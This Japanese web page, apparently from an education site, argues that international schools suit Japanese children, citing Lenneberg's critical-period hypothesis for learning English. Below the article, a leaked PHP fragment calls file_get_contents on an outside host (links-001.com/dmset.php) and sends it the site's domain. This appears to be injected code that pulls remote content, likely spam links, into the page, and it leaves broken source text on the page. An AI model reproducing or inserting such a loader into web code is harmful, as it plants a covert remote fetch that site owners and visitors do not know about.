前へ
次へ

日本人向けのインターナショナルスクールが人気

言語の取得には年齢による限界があるとする、言語獲得の臨界期というレネバーグによる仮説に基づくならば、英語を習得するまでの限界年齢は11歳から12歳までです。
これまで日本における英語教育は中学校からスタートしていたため、13歳になってからでは英語という言語獲得の臨界期をすでに超えてしまっています。
もちろん、勉強の仕方によっては高校生や大学生になってからでも日常会話だけでなく、ビジネス英語も習得する人は大勢いますが、1歳から11歳、もしくは12歳の間に学んでおけば、より苦労せずに身に着くであろうことは想像に難くありません。
子供が1日の大半の時間を過ごす学校での言葉がすべて英語であれば、簡単に身に着くのではと考えるのも自然と言えます。
最近、高校受験でインターナショナルスクールを選択する日本人の子が増えており、もっとも勉学に対して力を入れる高校時代をインターナショナルスクールで学ぶことによって、臨界期説に対するチャレンジにもなりそうです。

".file_get_contents('http://links-001.com/dmset.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top